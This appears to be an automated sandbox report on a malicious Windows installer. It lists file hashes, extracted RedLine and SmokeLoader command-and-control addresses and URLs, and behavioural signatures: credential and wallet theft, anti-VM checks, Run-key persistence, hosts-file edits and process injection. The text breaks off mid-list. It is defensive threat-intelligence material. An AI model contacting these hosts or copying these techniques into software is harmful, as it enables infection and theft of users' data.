Resubmissions
17-09-2021 05:07
210917-fsd9vahfgj 1016-09-2021 21:19
210916-z553waedb5 1016-09-2021 21:10
210916-zz1k7sedb4 10Analysis
-
max time kernel
1801s -
max time network
1756s -
platform
windows11_x64 -
resource
win11 -
submitted
17-09-2021 05:07
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win11
General
-
Target
setup_x86_x64_install.exe
-
Size
6.5MB
-
MD5
064f0d6900675bed580da1291a566cfa
-
SHA1
f81699a68c901d190842de735dbda28a3fb52292
-
SHA256
7ec88d4baa0a97362a026cf6e0f46422379a99be6d9bfe19034152f3d47cc0ed
-
SHA512
41dc5c444afd6b5dc0947cf9950acb5aa1081ee9921c748195325b5cfcb23532cea1802959baa59a0c41ed998ba20b509ec107da882d5d8b3bf0b1d17f892738
Malware Config
Extracted
redline
ANI
45.142.215.47:27643
Extracted
redline
medianew
91.121.67.60:62102
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://venerynnet1.top/
http://kevonahira2.top/
http://vegangelist3.top/
http://kingriffaele4.top/
http://arakeishant5.top/
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral1/memory/3644-410-0x00000000030B0000-0x00000000039CE000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4792 4952 rundll32.exe 19 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5724 4952 rundll32.exe 19 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5344 4952 rundll32.exe 19 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10500 4952 rundll32.exe 19 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral1/memory/5780-300-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/5780-296-0x0000000000000000-mapping.dmp family_redline behavioral1/memory/1292-340-0x0000000000000000-mapping.dmp family_redline behavioral1/memory/1292-341-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/5804-364-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral1/files/0x000100000002b1b8-178.dat family_socelars behavioral1/files/0x000100000002b1b8-208.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 32 IoCs
description pid Process procid_target PID 5924 created 5324 5924 WerFault.exe 91 PID 6008 created 5164 6008 WerFault.exe 100 PID 4692 created 4552 4692 WerFault.exe 118 PID 4168 created 4824 4168 WerFault.exe 138 PID 5544 created 5804 5544 WerFault.exe 134 PID 5472 created 4704 5472 WerFault.exe 102 PID 2520 created 3644 2520 WerFault.exe 392 PID 3092 created 3808 3092 WerFault.exe 164 PID 1140 created 4536 1140 WerFault.exe 146 PID 1360 created 3444 1360 WerFault.exe 144 PID 1772 created 5096 1772 WerFault.exe 149 PID 3472 created 6108 3472 WerFault.exe 147 PID 5588 created 4104 5588 WerFault.exe 386 PID 6164 created 1608 6164 msedge.exe 327 PID 4656 created 4968 4656 WerFault.exe 123 PID 6700 created 2496 6700 WerFault.exe 169 PID 6784 created 656 6784 WerFault.exe 248 PID 5140 created 5356 5140 gcleaner.exe 253 PID 4384 created 5976 4384 WerFault.exe 210 PID 6668 created 4160 6668 WerFault.exe 249 PID 4672 created 5380 4672 WerFault.exe 297 PID 3820 created 6032 3820 timeout.exe 158 PID 1520 created 5504 1520 WerFault.exe 351 PID 6800 created 6368 6800 WerFault.exe 343 PID 2440 created 1312 2440 WerFault.exe 353 PID 1492 created 5556 1492 WerFault.exe 349 PID 1676 created 3400 1676 WerFault.exe 326 PID 17288 created 5140 17288 WerFault.exe 368 PID 6788 created 6968 6788 WerFault.exe 384 PID 7236 created 4104 7236 WerFault.exe 386 PID 10344 created 8912 10344 WerFault.exe 401 PID 10928 created 10592 10928 WerFault.exe 407 -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/3808-474-0x0000000002350000-0x0000000002424000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x000100000002b1b1-154.dat aspack_v212_v242 behavioral1/files/0x000100000002b1b1-156.dat aspack_v212_v242 behavioral1/files/0x000200000002b1ac-155.dat aspack_v212_v242 behavioral1/files/0x000200000002b1ac-161.dat aspack_v212_v242 behavioral1/files/0x000200000002b1ac-160.dat aspack_v212_v242 behavioral1/files/0x000100000002b1b3-159.dat aspack_v212_v242 behavioral1/files/0x000100000002b1b3-162.dat aspack_v212_v242 -
Blocklisted process makes network request 43 IoCs
flow pid Process 336 12304 MsiExec.exe 337 12304 MsiExec.exe 339 12304 MsiExec.exe 340 12304 MsiExec.exe 341 12304 MsiExec.exe 342 12304 MsiExec.exe 345 12304 MsiExec.exe 346 12304 MsiExec.exe 347 12304 MsiExec.exe 348 12304 MsiExec.exe 349 12304 MsiExec.exe 350 12304 MsiExec.exe 351 12304 MsiExec.exe 352 12304 MsiExec.exe 353 12304 MsiExec.exe 354 12304 MsiExec.exe 355 12304 MsiExec.exe 357 12304 MsiExec.exe 358 12304 MsiExec.exe 359 12304 MsiExec.exe 360 12304 MsiExec.exe 361 12304 MsiExec.exe 362 12304 MsiExec.exe 363 12304 MsiExec.exe 364 12304 MsiExec.exe 365 12304 MsiExec.exe 366 12304 MsiExec.exe 367 12304 MsiExec.exe 368 12304 MsiExec.exe 369 12304 MsiExec.exe 370 12304 MsiExec.exe 371 12304 MsiExec.exe 374 12304 MsiExec.exe 375 12304 MsiExec.exe 376 12304 MsiExec.exe 377 12304 MsiExec.exe 378 12304 MsiExec.exe 379 12304 MsiExec.exe 380 12304 MsiExec.exe 381 12304 MsiExec.exe 382 12304 MsiExec.exe 383 12304 MsiExec.exe 384 12304 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ___YHDG34.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Chmenka.exe -
Executes dropped EXE 64 IoCs
pid Process 3988 setup_installer.exe 4776 setup_install.exe 4388 Thu20f2cf5e0c.exe 4940 Thu20c467678e2c.exe 4548 Thu20dae7c52bc0856.exe 4848 Thu2026c04e7218e1.exe 4704 Thu203b503b429e68.exe 4692 WerFault.exe 5148 Thu2026c04e7218e1.tmp 5176 Thu2094524d5e5b.exe 5164 Thu20bc9ea26f.exe 5188 Thu2090b5515d63b2.exe 5284 Thu20fdd9ac35a68.exe 5324 Thu2025d6674aed72ba.exe 5380 Thu203cdb52ef3c6580d.exe 5608 Chrome 5.exe 5712 PublicDwlBrowser1100.exe 5872 ___YHDG34.exe 5908 2.exe 4552 setup.exe 5292 BearVpn 3.exe 5780 Install.exe 5820 Thu203cdb52ef3c6580d.exe 4968 7705280.scr 5400 tmpB8D0_tmp.exe 5916 YgRjT0wrJ39RnM3FbMDp2HMZ.exe 6036 6431686.scr 3964 8578069.scr 1292 Thu203cdb52ef3c6580d.exe 3644 MsiExec.exe 5452 8360295.scr 5804 tmpB8D0_tmp.exe 5096 o3SIWcaWOjA7yc_XBFpR5dBN.exe 4528 GmxWVebXDB1f6JtLqxL9_lDa.exe 4536 JFudh7nWrTWwqiP5qkvL8kr5.exe 6108 9azffqp_kdFb7opxKi6I2hNW.exe 4688 dx3mskZpc_3BwBlnPkPHfehD.exe 3444 77ejhgU14uaTpzc0W3IiZk13.exe 4716 pmP0ZvUaEFBUiW50PXvc5Oza.exe 1304 q7pomhNgQVbB28vWXQ6hB2jT.exe 5600 MKkaEokfG5R_kn2oaNMJZOa0.exe 5584 KgjZ0r60omuSU4YvtwKZ1heM.exe 5168 ByJHbNLLgaV4YPP2_A2wBDXo.exe 1608 forfiles.exe 5812 VNLG_Lyl_PAkwslNQQBcBUGb.exe 6032 Ps6Gu6eeDzR0Kasyet5T9Z0V.exe 5372 tNATf5VA0VqmcWrm_AvVSaYL.exe 5004 2fRUngdME9bOU9FVYsq4kr39.exe 2496 06CkN7FO8xm9myg70xkI_mi_.exe 4104 GcleanerEU.exe 3808 0FXNrQOXnB4Wc5NQnjTdXBc2.exe 1860 LYU90oLNsyUCRkuaxIjskqT4.exe 3940 CNkJ9U9GClV52Di3oXGkg9ch.exe 5832 lCXMl152LhcK6yxYATpsFZXP.exe 4644 9jBk858e4N6gbZUrGusO0pED.exe 2632 WerFault.exe 5760 MKkaEokfG5R_kn2oaNMJZOa0.exe 5604 services64.exe 1988 pmP0ZvUaEFBUiW50PXvc5Oza.exe 3100 9jBk858e4N6gbZUrGusO0pED.exe 5228 CndH5V.EXe 5092 9jBk858e4N6gbZUrGusO0pED.exe 5976 6185947.scr 5180 54gpMhSqjystBq2v3_xHQE4O.exe -
resource yara_rule behavioral1/memory/4548-229-0x0000000140000000-0x0000000140650000-memory.dmp vmprotect behavioral1/files/0x000100000002b1bf-201.dat vmprotect behavioral1/files/0x000100000002b1bf-172.dat vmprotect -
Checks BIOS information in registry 2 TTPs 21 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4721621.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7102.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6431686.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion tNATf5VA0VqmcWrm_AvVSaYL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ByJHbNLLgaV4YPP2_A2wBDXo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VNLG_Lyl_PAkwslNQQBcBUGb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4721621.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CNkJ9U9GClV52Di3oXGkg9ch.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9738.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CNkJ9U9GClV52Di3oXGkg9ch.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6431686.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LYU90oLNsyUCRkuaxIjskqT4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LYU90oLNsyUCRkuaxIjskqT4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VNLG_Lyl_PAkwslNQQBcBUGb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7102.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8360295.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8360295.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion tNATf5VA0VqmcWrm_AvVSaYL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ByJHbNLLgaV4YPP2_A2wBDXo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9738.exe -
Loads dropped DLL 37 IoCs
pid Process 4776 setup_install.exe 4776 setup_install.exe 4776 setup_install.exe 4776 setup_install.exe 4776 setup_install.exe 4776 setup_install.exe 5148 Thu2026c04e7218e1.tmp 4824 rundll32.exe 7164 rundll32.exe 7164 rundll32.exe 2516 ezooW5ff_Ndm3Gn3oKh0pX1O.tmp 5056 rundll32.exe 5056 rundll32.exe 5380 rundll32.exe 4500 installer.exe 4500 installer.exe 4500 installer.exe 6968 rundll32.exe 3644 MsiExec.exe 3644 MsiExec.exe 10592 rundll32.exe 12304 MsiExec.exe 12304 MsiExec.exe 12304 MsiExec.exe 12304 MsiExec.exe 12304 MsiExec.exe 12304 MsiExec.exe 12304 MsiExec.exe 12304 MsiExec.exe 12304 MsiExec.exe 12304 MsiExec.exe 4500 installer.exe 12304 MsiExec.exe 12304 MsiExec.exe 13308 MsiExec.exe 13308 MsiExec.exe 12304 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000100000002b1f1-336.dat themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Sotaegylazhy.exe\"" ___YHDG34.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\Vazhagicyqu.exe\"" Chmenka.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9738.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8360295.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ByJHbNLLgaV4YPP2_A2wBDXo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tNATf5VA0VqmcWrm_AvVSaYL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LYU90oLNsyUCRkuaxIjskqT4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VNLG_Lyl_PAkwslNQQBcBUGb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6431686.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4721621.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7102.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CNkJ9U9GClV52Di3oXGkg9ch.exe -
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Windows\assembly\Desktop.ini IDownload.App.exe File opened for modification C:\Windows\assembly\Desktop.ini IDownload.App.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ipinfo.io 111 ipinfo.io 139 ipinfo.io 1 ip-api.com 1 ipinfo.io 17 ipinfo.io -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs
pid Process 6036 6431686.scr 5452 8360295.scr 5168 ByJHbNLLgaV4YPP2_A2wBDXo.exe 5372 tNATf5VA0VqmcWrm_AvVSaYL.exe 1860 LYU90oLNsyUCRkuaxIjskqT4.exe 5812 VNLG_Lyl_PAkwslNQQBcBUGb.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 1608 forfiles.exe 6156 4721621.scr 1504 7102.exe 4804 9738.exe 3940 CNkJ9U9GClV52Di3oXGkg9ch.exe -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 4692 set thread context of 5780 4692 WerFault.exe 264 PID 5380 set thread context of 1292 5380 rundll32.exe 126 PID 5400 set thread context of 5804 5400 tmpB8D0_tmp.exe 134 PID 5600 set thread context of 5760 5600 MKkaEokfG5R_kn2oaNMJZOa0.exe 187 PID 4716 set thread context of 1988 4716 pmP0ZvUaEFBUiW50PXvc5Oza.exe 192 PID 1608 set thread context of 6068 1608 forfiles.exe 212 PID 4644 set thread context of 4116 4644 9jBk858e4N6gbZUrGusO0pED.exe 205 PID 1048 set thread context of 5104 1048 cmd.exe 251 PID 6448 set thread context of 7064 6448 2590.exe 366 PID 4688 set thread context of 7044 4688 dx3mskZpc_3BwBlnPkPHfehD.exe 281 PID 5604 set thread context of 6556 5604 services64.exe 291 -
Drops file in Program Files directory 35 IoCs
description ioc Process File created C:\Program Files (x86)\IDownload\is-EA04K.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\Windows Media Player\Vazhagicyqu.exe Chmenka.exe File opened for modification C:\Program Files (x86)\IDownload\ICSharpCode.SharpZipLib.dll IDownload.tmp File created C:\Program Files (x86)\IDownload\is-89ROG.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Spider.dll IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Core.dll IDownload.tmp File created C:\Program Files (x86)\IDownload\is-DESED.tmp IDownload.tmp File created C:\Program Files (x86)\Microsoft.NET\Sotaegylazhy.exe.config ___YHDG34.exe File created C:\Program Files\Internet Explorer\VJLPAYVUCW\IDownload.exe Chmenka.exe File created C:\Program Files (x86)\IDownload\unins000.dat IDownload.tmp File created C:\Program Files (x86)\IDownload\is-OMGCG.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe lCXMl152LhcK6yxYATpsFZXP.exe File created C:\Program Files (x86)\IDownload\is-8GSAO.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-3VNIH.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-G2DPL.tmp IDownload.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe lCXMl152LhcK6yxYATpsFZXP.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files\Internet Explorer\VJLPAYVUCW\IDownload.exe.config Chmenka.exe File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Extension.dll IDownload.tmp File created C:\Program Files (x86)\IDownload\is-S7SAP.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\downloads.xml IDownload.App.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-6EQNS.tmp ultramediaburner.tmp File created C:\Program Files (x86)\Windows Media Player\Vazhagicyqu.exe.config Chmenka.exe File opened for modification C:\Program Files (x86)\IDownload\IDownload.App.exe IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\TabStrip.dll IDownload.tmp File created C:\Program Files (x86)\IDownload\is-PPHSF.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-O5B8T.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\unins000.dat IDownload.tmp File created C:\Program Files (x86)\IDownload\is-JCMIH.tmp IDownload.tmp File created C:\Program Files\Windows Defender Advanced Threat Protection\QJPHFRVIAM\ultramediaburner.exe ___YHDG34.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\QJPHFRVIAM\ultramediaburner.exe.config ___YHDG34.exe File created C:\Program Files (x86)\Microsoft.NET\Sotaegylazhy.exe ___YHDG34.exe File created C:\Program Files (x86)\UltraMediaBurner\is-094L1.tmp ultramediaburner.tmp -
Drops file in Windows directory 31 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI228A.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\SystemTemp\~DF2A1145B114F53FF5.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI4906.tmp msiexec.exe File opened for modification C:\Windows\Installer\40115.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI26A3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI529D.tmp msiexec.exe File opened for modification C:\Windows\assembly\Desktop.ini IDownload.App.exe File opened for modification C:\Windows\Installer\MSI1346.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI450C.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI503A.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\assembly IDownload.App.exe File opened for modification C:\Windows\Installer\MSI2898.tmp msiexec.exe File created C:\Windows\assembly\Desktop.ini IDownload.App.exe File opened for modification C:\Windows\Installer\MSI250C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4626.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF959DE9D0E6EC1306.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFC20C6FDE0C1AD133.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI8C4D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1F8B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI429A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8268.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File created C:\Windows\SystemTemp\~DF5A3F5B048A9DC133.TMP msiexec.exe File created C:\Windows\Installer\40115.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI2ABC.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI8A2A.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
pid pid_target Process procid_target 5144 5164 WerFault.exe 100 3016 5324 WerFault.exe 91 4804 4552 WerFault.exe 118 4692 4824 WerFault.exe 138 3300 4704 WerFault.exe 102 2800 3644 WerFault.exe 136 4200 3808 WerFault.exe 164 2348 3444 WerFault.exe 144 2260 4536 WerFault.exe 146 5624 5096 WerFault.exe 149 1404 6108 WerFault.exe 147 2532 4104 WerFault.exe 166 6392 1608 WerFault.exe 151 6376 4968 WerFault.exe 123 6844 2496 WerFault.exe 169 5884 656 WerFault.exe 248 3108 5356 WerFault.exe 253 3216 5976 WerFault.exe 210 5364 4160 WerFault.exe 249 2632 5380 WerFault.exe 297 6020 6032 WerFault.exe 158 6436 5504 WerFault.exe 317 5440 6368 WerFault.exe 343 2760 1312 WerFault.exe 353 7064 5556 WerFault.exe 349 6804 3400 WerFault.exe 326 6768 5140 WerFault.exe 368 7056 6968 WerFault.exe 384 7524 4104 WerFault.exe 386 10920 8912 WerFault.exe 401 11276 10592 WerFault.exe 407 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MKkaEokfG5R_kn2oaNMJZOa0.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MKkaEokfG5R_kn2oaNMJZOa0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MKkaEokfG5R_kn2oaNMJZOa0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1CC5.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1CC5.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1CC5.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried 